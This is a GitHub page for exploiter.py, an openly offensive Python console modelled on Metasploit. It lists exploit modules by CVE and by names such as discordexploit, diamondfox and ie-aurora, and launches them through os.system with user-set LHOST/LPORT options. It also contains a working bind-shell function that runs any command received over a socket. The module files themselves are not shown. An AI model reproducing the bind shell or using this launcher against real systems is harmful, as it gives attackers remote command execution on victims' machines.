-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploiter.py
148 lines (131 loc) · 6.11 KB
/
exploiter.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
import os
import json
from colorama import init, Fore, Style
import socket
import subprocess
import base64
import requests
# Initialize color settings
init(autoreset=True)
# Exploit list and options
exploits = {
"multi/handler": {"LHOST": "0.0.0.0", "LPORT": "4444", "RHOST": None, "RPORT": None, "FILENAME": "multi.handler", "ARG": None, "ARGRUN": None},
"discordexploit": {"LHOST": None, "LPORT": None, "RHOST": None, "RPORT": None, "FILENAME": "discord_exploit", "ARG": None, "ARGRUN": None},
"dropleganger": {"LHOST": None, "LPORT": None, "RHOST": None, "RPORT": None, "FILENAME": "dropleganger", "ARG": None, "ARGRUN": None},
"hydrapwn": {"LHOST": None, "LPORT": None, "RHOST": None, "RPORT": None, "FILENAME": "hydrapwn", "ARG": None, "ARGRUN": None},
"collectid": {"LHOST": None, "LPORT": None, "RHOST": None, "RPORT": None, "FILENAME": "collectid", "ARG": None, "ARGRUN": None},
"cve-2006": {"LHOST": None, "LPORT": None, "RHOST": None, "RPORT": None, "FILENAME": "cve_2006", "ARG": None, "ARGRUN": None},
"cve-2016-3074": {"LHOST": None, "LPORT": None, "RHOST": None, "RPORT": None, "FILENAME": "cve_2016_3074", "ARG": None, "ARGRUN": None},
"cve-2018-6389": {"LHOST": None, "LPORT": None, "RHOST": None, "RPORT": None, "FILENAME": "cve_2018_6389", "ARG": None, "ARGRUN": None},
"cve-2018-10561": {"LHOST": None, "LPORT": None, "RHOST": None, "RPORT": None, "FILENAME": "cve_2018_10561", "ARG": None, "ARGRUN": None},
"camexploit2": {"LHOST": None, "LPORT": None, "RHOST": None, "RPORT": None, "FILENAME": "camexploit2", "ARG": None, "ARGRUN": None},
"crashcast": {"LHOST": None, "LPORT": None, "RHOST": None, "RPORT": None, "FILENAME": "crashcast", "ARG": None, "ARGRUN": None},
"diamondfox": {"LHOST": None, "LPORT": None, "RHOST": None, "RPORT": None, "FILENAME": "diamondfox", "ARG": None, "ARGRUN": None},
"fuzzer_exp": {"LHOST": None, "LPORT": None, "RHOST": None, "RPORT": None, "FILENAME": "fuzzer_exp", "ARG": None, "ARGRUN": None},
"ie-aurora": {"LHOST": None, "LPORT": None, "RHOST": None, "RPORT": None, "FILENAME": "ie_aurora", "ARG": None, "ARGRUN": None},
}
# Global variables
current_exploit = None
log_file = "exploiter.log"
def inputer(exploitpth=None):
"""Sets the console input prompt."""
global prompt
exploit = exploitpth if exploitpth else None
prompt = (
f"int4 exploit({Fore.RED + Style.BRIGHT}{exploit}{Style.RESET_ALL}) > " if exploit else
f"int4 ({Fore.RED}exploiter{Style.RESET_ALL}) > "
)
inputer()
def bind_shell(target_port):
s = socket.socket()
s.bind(("", target_port))
s.listen(1)
conn, addr = s.accept()
while True:
command = conn.recv(1024).decode()
if command.lower() == "exit":
break
output = subprocess.run(command, shell=True, capture_output=True)
conn.send(output.stdout + output.stderr)
conn.close()
s.close()
def list_exploits():
"""Lists available exploits."""
print("\nAvailable Exploits:")
for exploit in exploits:
print(f"- {exploit}")
print()
def show_options():
"""Shows options for the selected exploit."""
if current_exploit is None:
print("No exploit selected. Use `use [exploit_name]` to select an exploit.")
return
print("\nOptions for exploit:", current_exploit)
options = exploits[current_exploit]
print("Name Current Setting Required Description")
print("---- --------------- -------- -----------")
for opt, value in options.items():
required = "yes" if opt in ["LHOST", "LPORT"] else "no"
current_value = value if value else "Not set"
print(f"{opt:<9} {current_value:<15} {required:<10} Connection Parameter")
print()
def save_options():
"""Saves options to a file."""
if current_exploit is None:
print("No exploit selected.")
return
options = {opt: value for opt, value in exploits[current_exploit].items() if value is not None}
with open(log_file, "w") as f:
json.dump(options, f)
print("Options saved to log file.")
def run_exploit():
"""Executes the selected exploit."""
if current_exploit is None:
print("No exploit selected. Use `use [exploit_name]` to select an exploit.")
return
options = exploits[current_exploit]
exploit_filename = options["FILENAME"]
if exploit_filename is None:
print("Exploit file is not defined for this exploit.")
return
command = f"python modules/exploits/{exploit_filename}"
if options['ARG'] is not None:
command += f" {options['ARG']}"
if options['ARGRUN'] is not None:
command += f" {options['ARGRUN']}"
try:
os.system(command)
except Exception as e:
print(f"Failed to run exploit: {str(e)}")
if __name__ == "__main__":
# Main loop
while True:
sploit = input(prompt)
if sploit.lower() == "list exploits":
list_exploits()
elif sploit.lower() == "show options":
show_options()
elif sploit.lower() == "run":
run_exploit()
elif sploit.startswith("set"):
parts = sploit.split(" ")
if len(parts) == 3:
option_name, option_value = parts[1], parts[2]
if current_exploit and option_name in exploits[current_exploit]:
exploits[current_exploit][option_name] = option_value
print(f"{option_name} set to {option_value}.")
elif sploit.startswith("use"):
exploit_name = sploit.split()[1] if len(sploit.split()) > 1 else None
if exploit_name in exploits:
current_exploit = exploit_name
inputer(current_exploit)
print(f"Exploit '{current_exploit}' selected.")
else:
print(f"Exploit '{exploit_name}' not found.")
elif sploit.lower() == "reset":
if current_exploit:
exploits[current_exploit] = {k: None for k in exploits[current_exploit]}
print(f"Options for {current_exploit} reset to default.")
elif sploit.lower() == "exit":
print("Exiting...")
break